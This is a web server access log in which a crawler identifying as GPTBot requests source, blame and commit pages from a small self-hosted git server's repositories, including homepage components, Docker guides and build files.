"https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/README.md" -[17/Feb/2026:15:47:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components/About.tsx?display=rendered" [Client 74.7.227.38] [Length 10909] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components/About.tsx" -[17/Feb/2026:15:47:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components/Footer.tsx?display=rendered" [Client 74.7.227.38] [Length 10908] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components/Footer.tsx" -[17/Feb/2026:15:47:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components/Services.tsx?display=rendered" [Client 74.7.227.38] [Length 10909] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components/Services.tsx" -[17/Feb/2026:15:47:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components/ChatBot.tsx?display=rendered" [Client 74.7.227.38] [Length 10910] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components/ChatBot.tsx" -[17/Feb/2026:15:47:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components/Hero.tsx?display=source" [Client 74.7.227.38] [Length 13887] [Gzip 3.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components/Hero.tsx" -[17/Feb/2026:15:47:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components/Header.tsx?display=rendered" [Client 74.7.227.38] [Length 10908] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components/Header.tsx" -[17/Feb/2026:15:47:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components/Header.tsx?display=source" [Client 74.7.227.38] [Length 14823] [Gzip 4.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components/Header.tsx" -[17/Feb/2026:15:47:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components/Services.tsx?display=source" [Client 74.7.227.38] [Length 14666] [Gzip 4.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components/Services.tsx" -[17/Feb/2026:15:47:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components/ChatBot.tsx?display=source" [Client 74.7.227.38] [Length 15556] [Gzip 4.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components/ChatBot.tsx" -[17/Feb/2026:15:47:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components/Footer.tsx?display=source" [Client 74.7.227.38] [Length 14210] [Gzip 4.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components/Footer.tsx" -[17/Feb/2026:15:47:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components/About.tsx?display=source" [Client 74.7.227.38] [Length 13938] [Gzip 4.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components/About.tsx" -[17/Feb/2026:15:47:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components/Contact.tsx?display=rendered" [Client 74.7.227.38] [Length 10912] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components/Contact.tsx" -[17/Feb/2026:15:48:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components/Hero.tsx?display=rendered" [Client 74.7.227.38] [Length 10908] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components/Hero.tsx" -[17/Feb/2026:15:48:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components/Contact.tsx?display=source" [Client 74.7.227.38] [Length 16482] [Gzip 5.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components/Contact.tsx" -[17/Feb/2026:15:48:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/controller-next-todo.md" [Client 74.7.227.38] [Length 11756] [Gzip 3.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project" -[17/Feb/2026:15:48:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/start.sh?display=source" [Client 74.7.227.38] [Length 14932] [Gzip 4.65] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/start.sh" -[17/Feb/2026:15:48:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/docker-compose.yml?display=rendered" [Client 74.7.227.38] [Length 10887] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/docker-compose.yml" -[17/Feb/2026:15:48:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb?files=asset_pilot_docker%2f.venv%2fbin%2factivate.fish" [Client 74.7.227.38] [Length 26590] [Gzip 4.61] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/activate.fish" -[17/Feb/2026:15:48:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/html/assets/images/instrument.png" [Client 74.7.227.38] [Length 9833] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/images/instrument.png" -[17/Feb/2026:15:48:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/.NETCoreApp%2CVersion=v8.0.AssemblyAttributes.cs" [Client 74.7.227.38] [Length 11318] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0" -[17/Feb/2026:15:48:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/DOCKER_GUIDE.md?display=rendered" [Client 74.7.227.38] [Length 15946] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/DOCKER_GUIDE.md" -[17/Feb/2026:15:48:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/__init__.py" [Client 74.7.227.38] [Length 12678] [Gzip 5.70] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/__init__.py" -[17/Feb/2026:15:48:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2fTestProject%2fbuild%2fCMakeFiles%2fMakefile2" [Client 74.7.227.38] [Length 28507] [Gzip 5.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/Makefile2" -[17/Feb/2026:15:48:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument/DOCKER_QUICKSTART.md?display=rendered" [Client 74.7.227.38] [Length 14284] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument/DOCKER_QUICKSTART.md" -[17/Feb/2026:15:48:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument/MIGRATION_GUIDE.md?display=rendered" [Client 74.7.227.38] [Length 15774] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument/MIGRATION_GUIDE.md" -[17/Feb/2026:15:48:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/controller-next-todo.md" [Client 74.7.227.38] [Length 9959] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/controller-next-todo.md" -[17/Feb/2026:15:48:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/requirements.txt?display=rendered" [Client 74.7.227.38] [Length 10919] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/requirements.txt" -[17/Feb/2026:15:48:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/requirements.txt?display=rendered" [Client 74.7.227.38] [Length 10949] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/requirements.txt" -[17/Feb/2026:15:48:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/requirements.txt?display=source" [Client 74.7.227.38] [Length 11373] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/requirements.txt" -[17/Feb/2026:15:48:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/requirements.txt?display=source" [Client 74.7.227.38] [Length 11341] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/requirements.txt" -[17/Feb/2026:15:48:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/blame/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/.NETCoreApp%2CVersion=v8.0.AssemblyAttributes.cs" [Client 74.7.227.38] [Length 10314] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/.NETCoreApp%2CVersion=v8.0.AssemblyAttributes.cs" -[17/Feb/2026:15:48:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/.NETCoreApp%2CVersion=v8.0.AssemblyAttributes.cs" [Client 74.7.227.38] [Length 194] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/.NETCoreApp%2CVersion=v8.0.AssemblyAttributes.cs" -[17/Feb/2026:15:48:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?files=.vscode%2fsettings.json" [Client 74.7.227.38] [Length 21862] [Gzip 3.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/.vscode/settings.json" -[17/Feb/2026:15:48:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument/MIGRATION_GUIDE.md?display=source" [Client 74.7.227.38] [Length 20876] [Gzip 6.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument/MIGRATION_GUIDE.md" -[17/Feb/2026:15:48:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument/DOCKER_QUICKSTART.md?display=source" [Client 74.7.227.38] [Length 18095] [Gzip 5.64] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument/DOCKER_QUICKSTART.md" -[17/Feb/2026:15:48:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/templates/index.html?display=rendered" [Client 74.7.227.38] [Length 10973] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/templates/index.html" -[17/Feb/2026:15:48:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/keys.json?display=source" [Client 74.7.227.38] [Length 12791] [Gzip 2.77] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/keys.json" -[17/Feb/2026:15:48:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/keys.json?display=source" [Client 74.7.227.38] [Length 12761] [Gzip 2.78] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/keys.json" -[17/Feb/2026:15:48:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/keys.json?display=source" [Client 74.7.227.38] [Length 12794] [Gzip 2.77] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/keys.json" -[17/Feb/2026:15:48:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?files=.vscode%2flaunch.json" [Client 74.7.227.38] [Length 21957] [Gzip 3.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/.vscode/launch.json" -[17/Feb/2026:15:48:14 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/html/services/geminiService.ts" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/html/services/geminiService.ts" -[17/Feb/2026:15:48:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/html/services/geminiService.ts" -[17/Feb/2026:15:48:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/BatchControl.png?display=rendered" [Client 74.7.227.38] [Length 10835] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/BatchControl.png" -[17/Feb/2026:15:48:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom1.png?display=rendered" [Client 74.7.227.38] [Length 10865] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom1.png" -[17/Feb/2026:15:48:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/projects.sln?display=rendered" [Client 74.7.227.38] [Length 11044] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/projects.sln" -[17/Feb/2026:15:48:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument/MIGRATION_GUIDE.md?display=rendered" [Client 74.7.227.38] [Length 15815] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument/MIGRATION_GUIDE.md" -[17/Feb/2026:15:48:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument/DOCKER_QUICKSTART.md?display=source" [Client 74.7.227.38] [Length 18133] [Gzip 5.63] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument/DOCKER_QUICKSTART.md" -[17/Feb/2026:15:48:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument/MIGRATION_GUIDE.md?display=source" [Client 74.7.227.38] [Length 20919] [Gzip 6.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument/MIGRATION_GUIDE.md" -[17/Feb/2026:15:48:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument/DOCKER_QUICKSTART.md?display=rendered" [Client 74.7.227.38] [Length 14322] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument/DOCKER_QUICKSTART.md" -[17/Feb/2026:15:48:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/include/site/python3.12/greenlet" [Client 74.7.227.38] [Length 10086] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv" -[17/Feb/2026:15:48:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/compile_commands.json" [Client 74.7.227.38] [Length 9944] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/compile_commands.json" -[17/Feb/2026:15:48:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/compile_commands.json" [Client 74.7.227.38] [Length 9943] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 